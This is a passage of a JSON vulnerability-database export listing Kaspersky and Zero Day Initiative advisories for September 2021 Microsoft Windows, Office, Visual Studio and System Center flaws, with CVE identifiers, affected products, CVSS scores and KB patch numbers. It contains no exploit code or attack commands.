\n[CVE-2021-38644](<https://nvd.nist.gov/vuln/detail/CVE-2021-38644>) \n[CVE-2021-36967](<https://nvd.nist.gov/vuln/detail/CVE-2021-36967>) \n[CVE-2021-36959](<https://nvd.nist.gov/vuln/detail/CVE-2021-36959>) \n[CVE-2021-36960](<https://nvd.nist.gov/vuln/detail/CVE-2021-36960>) \n[CVE-2021-38636](<https://nvd.nist.gov/vuln/detail/CVE-2021-38636>) \n[CVE-2021-38634](<https://nvd.nist.gov/vuln/detail/CVE-2021-38634>) \n[CVE-2021-36972](<https://nvd.nist.gov/vuln/detail/CVE-2021-36972>) \n[CVE-2021-36969](<https://nvd.nist.gov/vuln/detail/CVE-2021-36969>) \n[CVE-2021-26435](<https://nvd.nist.gov/vuln/detail/CVE-2021-26435>) \n[CVE-2021-36955](<https://nvd.nist.gov/vuln/detail/CVE-2021-36955>) \n[CVE-2021-38630](<https://nvd.nist.gov/vuln/detail/CVE-2021-38630>) \n[CVE-2021-38671](<https://nvd.nist.gov/vuln/detail/CVE-2021-38671>) \n[CVE-2021-40447](<https://nvd.nist.gov/vuln/detail/CVE-2021-40447>) \n[CVE-2021-36974](<https://nvd.nist.gov/vuln/detail/CVE-2021-36974>) \n[CVE-2021-38629](<https://nvd.nist.gov/vuln/detail/CVE-2021-38629>) \n[CVE-2021-38639](<https://nvd.nist.gov/vuln/detail/CVE-2021-38639>) \n[CVE-2021-36966](<https://nvd.nist.gov/vuln/detail/CVE-2021-36966>) \n[CVE-2021-38667](<https://nvd.nist.gov/vuln/detail/CVE-2021-38667>) \n[CVE-2021-36965](<https://nvd.nist.gov/vuln/detail/CVE-2021-36965>) \n[CVE-2021-36963](<https://nvd.nist.gov/vuln/detail/CVE-2021-36963>) \n[CVE-2021-38624](<https://nvd.nist.gov/vuln/detail/CVE-2021-38624>) \n[CVE-2021-38661](<https://nvd.nist.gov/vuln/detail/CVE-2021-38661>) \n[CVE-2021-36954](<https://nvd.nist.gov/vuln/detail/CVE-2021-36954>) \n[CVE-2021-38633](<https://nvd.nist.gov/vuln/detail/CVE-2021-38633>) \n[CVE-2021-36975](<https://nvd.nist.gov/vuln/detail/CVE-2021-36975>) \n[CVE-2021-38637](<https://nvd.nist.gov/vuln/detail/CVE-2021-38637>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *KB list*:\n[5005613](<http://support.microsoft.com/kb/5005613>) \n[5005568](<http://support.microsoft.com/kb/5005568>) \n[5005575](<http://support.microsoft.com/kb/5005575>) \n[5005627](<http://support.microsoft.com/kb/5005627>) \n[5005565](<http://support.microsoft.com/kb/5005565>) \n[5005623](<http://support.microsoft.com/kb/5005623>) \n[5005573](<http://support.microsoft.com/kb/5005573>) \n[5005569](<http://support.microsoft.com/kb/5005569>) \n[5005566](<http://support.microsoft.com/kb/5005566>) \n[5005607](<http://support.microsoft.com/kb/5005607>) \n[5006699](<http://support.microsoft.com/kb/5006699>) \n[5006672](<http://support.microsoft.com/kb/5006672>) \n[5006674](<http://support.microsoft.com/kb/5006674>) \n[5006670](<http://support.microsoft.com/kb/5006670>) \n[5006667](<http://support.microsoft.com/kb/5006667>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "kaspersky", "title": "KLA12290 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26435", "CVE-2021-36954", "CVE-2021-36955", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36966", "CVE-2021-36967", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36973", "CVE-2021-36974", "CVE-2021-36975", "CVE-2021-38624", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38632", "CVE-2021-38633", "CVE-2021-38634", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38637", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38644", "CVE-2021-38661", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40447"], "modified": "2021-10-14T00:00:00", "id": "KLA12290", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12290/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-08T15:37:45", "description": "### *Detect date*:\n09/07/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nA remote code execution vulnerability was found in Microsoft Producy (Extended Security Update). Malicious users can exploit this vulnerability to execute arbitrary code.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2022 \nWindows Server 2022 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server, version 2004 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2016 \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 8.1 for x64-based systems \nWindows RT 8.1 \nWindows 10 for x64-based Systems \nWindows Server 2012 R2 \nWindows Server 2012 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2019 \nWindows 10 Version 1607 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 20H2 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 for 32-bit Systems \nWindows 10 Version 20H2 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2021-40444](<https://vulners.com/cve/CVE-2021-40444>)6.8High\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[5005563](<http://support.microsoft.com/kb/5005563>) \n[5005633](<http://support.microsoft.com/kb/5005633>) \n[5005606](<http://support.microsoft.com/kb/5005606>) \n[5019958](<http://support.microsoft.com/kb/5019958>)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-07T00:00:00", "type": "kaspersky", "title": "KLA12278 RCE vulnerability in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-06-05T00:00:00", "id": "KLA12278", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12278/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-08T15:37:50", "description": "### *Detect date*:\n09/07/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nA remote code execution vulnerability was found in Microsoft Windows. Malicious users can exploit this vulnerability to execute arbitrary code.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2022 \nWindows Server 2022 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server, version 2004 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2016 \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 8.1 for x64-based systems \nWindows RT 8.1 \nWindows 10 for x64-based Systems \nWindows Server 2012 R2 \nWindows Server 2012 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2019 \nWindows 10 Version 1607 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 20H2 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 for 32-bit Systems \nWindows 10 Version 20H2 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2021-40444](<https://vulners.com/cve/CVE-2021-40444>)6.8High\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[5005613](<http://support.microsoft.com/kb/5005613>) \n[5005568](<http://support.microsoft.com/kb/5005568>) \n[5005575](<http://support.microsoft.com/kb/5005575>) \n[5005627](<http://support.microsoft.com/kb/5005627>) \n[5005563](<http://support.microsoft.com/kb/5005563>) \n[5005565](<http://support.microsoft.com/kb/5005565>) \n[5005623](<http://support.microsoft.com/kb/5005623>) \n[5005573](<http://support.microsoft.com/kb/5005573>) \n[5005569](<http://support.microsoft.com/kb/5005569>) \n[5005566](<http://support.microsoft.com/kb/5005566>)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-07T00:00:00", "type": "kaspersky", "title": "KLA12277 RCE vulnerability in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-06-05T00:00:00", "id": "KLA12277", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12277/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:57:07", "description": "### *Detect date*:\n09/14/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Developer Tools. Malicious users can exploit these vulnerabilities to execute arbitrary code, spoof user interface, gain privileges.\n\n### *Affected products*:\nMicrosoft Visual Studio 2017 version 15.9 (includes 15.0 - 15.8) \nMicrosoft Visual Studio 2019 version 16.7 (includes 16.0 \u2013 16.6) \nMicrosoft Visual Studio 2019 version 16.11 (includes 16.0 - 16.10) \nMicrosoft Visual Studio 2019 version 16.9 (includes 16.0 - 16.8) \nVisual Studio Code \nMicrosoft Visual Studio 2019 version 16.4 (includes 16.0 - 16.3)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-36952](<https://nvd.nist.gov/vuln/detail/CVE-2021-36952>) \n[CVE-2021-26437](<https://nvd.nist.gov/vuln/detail/CVE-2021-26437>) \n[CVE-2021-26434](<https://nvd.nist.gov/vuln/detail/CVE-2021-26434>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Visual Studio](<https://threats.kaspersky.com/en/product/Microsoft-Visual-Studio/>)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "kaspersky", "title": "KLA12285 Multiple vulnerabilities in Microsoft Developer Tools", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26434", "CVE-2021-26437", "CVE-2021-36952"], "modified": "2021-09-16T00:00:00", "id": "KLA12285", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12285/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T16:30:39", "description": "### *Detect date*:\n09/14/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Office. Malicious users can exploit these vulnerabilities to execute arbitrary code, spoof user interface.\n\n### *Affected products*:\nMicrosoft Office 2013 Service Pack 1 (32-bit editions) \nMicrosoft Excel 2013 Service Pack 1 (64-bit editions) \nMicrosoft Office 2019 for 64-bit editions \nMicrosoft Excel 2016 (32-bit edition) \nMicrosoft Office 2019 for Mac \nMicrosoft Office 2013 Service Pack 1 (64-bit editions) \nMicrosoft 365 Apps for Enterprise for 32-bit Systems \nMicrosoft Office 2016 (32-bit edition) \nMicrosoft SharePoint Enterprise Server 2016 \nMicrosoft Office 2016 (64-bit edition) \nMicrosoft Excel 2013 Service Pack 1 (32-bit editions) \nMicrosoft Office Online Server \nMicrosoft 365 Apps for Enterprise for 64-bit Systems \nMicrosoft Office Web Apps Server 2013 Service Pack 1 \nMicrosoft Office 2019 for 32-bit editions \nMicrosoft Excel 2016 (64-bit edition) \nMicrosoft Office 2013 RT Service Pack 1 \nMicrosoft Excel 2013 RT Service Pack 1 \nMicrosoft SharePoint Foundation 2013 Service Pack 1 \nMicrosoft SharePoint Server 2019\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-38660](<https://nvd.nist.gov/vuln/detail/CVE-2021-38660>) \n[CVE-2021-38654](<https://nvd.nist.gov/vuln/detail/CVE-2021-38654>) \n[CVE-2021-38655](<https://nvd.nist.gov/vuln/detail/CVE-2021-38655>) \n[CVE-2021-38656](<https://nvd.nist.gov/vuln/detail/CVE-2021-38656>) \n[CVE-2021-38659](<https://nvd.nist.gov/vuln/detail/CVE-2021-38659>) \n[CVE-2021-38653](<https://nvd.nist.gov/vuln/detail/CVE-2021-38653>) \n[CVE-2021-38658](<https://nvd.nist.gov/vuln/detail/CVE-2021-38658>) \n[CVE-2021-38651](<https://nvd.nist.gov/vuln/detail/CVE-2021-38651>) \n[CVE-2021-38646](<https://nvd.nist.gov/vuln/detail/CVE-2021-38646>) \n[CVE-2021-38652](<https://nvd.nist.gov/vuln/detail/CVE-2021-38652>) \n[CVE-2021-38650](<https://nvd.nist.gov/vuln/detail/CVE-2021-38650>) \n[CVE-2021-38657](<https://nvd.nist.gov/vuln/detail/CVE-2021-38657>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Office](<https://threats.kaspersky.com/en/product/Microsoft-Office/>)\n\n### *KB list*:\n[4484108](<http://support.microsoft.com/kb/4484108>) \n[5001997](<http://support.microsoft.com/kb/5001997>) \n[5002014](<http://support.microsoft.com/kb/5002014>) \n[5002024](<http://support.microsoft.com/kb/5002024>) \n[5002007](<http://support.microsoft.com/kb/5002007>) \n[4484103](<http://support.microsoft.com/kb/4484103>) \n[5002009](<http://support.microsoft.com/kb/5002009>) \n[5002018](<http://support.microsoft.com/kb/5002018>) \n[5002003](<http://support.microsoft.com/kb/5002003>) \n[5002020](<http://support.microsoft.com/kb/5002020>) \n[5001999](<http://support.microsoft.com/kb/5001999>) \n[5002005](<http://support.microsoft.com/kb/5002005>) \n[5001958](<http://support.microsoft.com/kb/5001958>)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "kaspersky", "title": "KLA12288 Multiple vulnerabilities in Microsoft Office", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38646", "CVE-2021-38650", "CVE-2021-38651", "CVE-2021-38652", "CVE-2021-38653", "CVE-2021-38654", "CVE-2021-38655", "CVE-2021-38656", "CVE-2021-38657", "CVE-2021-38658", "CVE-2021-38659", "CVE-2021-38660"], "modified": "2021-09-16T00:00:00", "id": "KLA12288", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12288/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T16:30:33", "description": "### *Detect date*:\n09/14/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft System Center. Malicious users can exploit these vulnerabilities to execute arbitrary code, cause denial of service, gain privileges.\n\n### *Affected products*:\nAzure Diagnostics (LAD) \nAzure Security Center \nSystem Center Operations Manager (SCOM) \nContainer Monitoring Solution \nAzure Open Management Infrastructure \nAzure Stack Hub \nAzure Automation State Configuration, DSC Extension \nAzure Sentinel \nLog Analytics Agent \nAzure Automation Update Management\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-38647](<https://nvd.nist.gov/vuln/detail/CVE-2021-38647>) \n[CVE-2021-38648](<https://nvd.nist.gov/vuln/detail/CVE-2021-38648>) \n[CVE-2021-38649](<https://nvd.nist.gov/vuln/detail/CVE-2021-38649>) \n[CVE-2021-38645](<https://nvd.nist.gov/vuln/detail/CVE-2021-38645>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft System Center Operations Manager](<https://threats.kaspersky.com/en/product/Microsoft-System-Center-Operations-Manager/>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "kaspersky", "title": "KLA12297 Multiple vulnerabilities in Microsoft System Center", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649"], "modified": "2021-09-30T00:00:00", "id": "KLA12297", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12297/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdi": [{"lastseen": "2023-05-23T15:48:30", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Visual Studio. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DDS files. Crafted data in a DDS file can trigger an overflow of a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T00:00:00", "type": "zdi", "title": "Microsoft Visual Studio DDS File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36952"], "modified": "2021-09-16T00:00:00", "id": "ZDI-21-1076", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-1076/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T15:48:28", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Word. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DOC files. Crafted data in a DOC file can cause a pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T00:00:00", "type": "zdi", "title": "Microsoft Word DOC File Parsing Use-After-Free Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38656"], "modified": "2021-09-16T00:00:00", "id": "ZDI-21-1082", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-1082/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T15:48:27", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft PowerPoint. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PPT files. The issue results from the lack of validating the existence of an object prior to performing further free operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T00:00:00", "type": "zdi", "title": "Microsoft PowerPoint PPT File Parsing Double Free Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 